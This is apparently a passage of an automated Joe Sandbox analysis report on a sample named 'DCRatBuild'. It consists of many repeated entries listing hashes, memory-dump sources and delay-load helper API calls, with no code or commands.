                      • Instruction ID: df7366d306a2b16ccad13115186cfc401355a8a6fcf7f669d030a25b460a51b1
                      • Opcode Fuzzy Hash: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
                      • Instruction Fuzzy Hash: 22B012D12AC1026C320871457E03F3B126EEDC0B20330C11FF40FC1144F8448C085531
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                      • Instruction ID: b0ecf3ea35b1c5b10cda06acc0e4ab1dd38c2c42f0fdac3be57544ad50380d31
                      • Opcode Fuzzy Hash: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                      • Instruction Fuzzy Hash: 86B0129526C302AD320C61047D03E36123DCCC8F20335C51FF50ED1140F580AC084431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                      • Instruction ID: 957a858cd452b4f9721ea89e7588a8c0f3510b5c1df8a40182a149b223306f70
                      • Opcode Fuzzy Hash: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                      • Instruction Fuzzy Hash: 29B0129527C302AD320C61047D03E36123DCCC4F20334C51FF10ED1140F980AC084431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                      • Instruction ID: a01f909225eb793e44d7e98860adb84f7cb1c8dcc4ecbf14a34575b5c53b5b44
                      • Opcode Fuzzy Hash: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                      • Instruction Fuzzy Hash: C2B0129526C302BD320C21007F03D36523ECDC4F20335C61FF10EE0040B580AC485431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
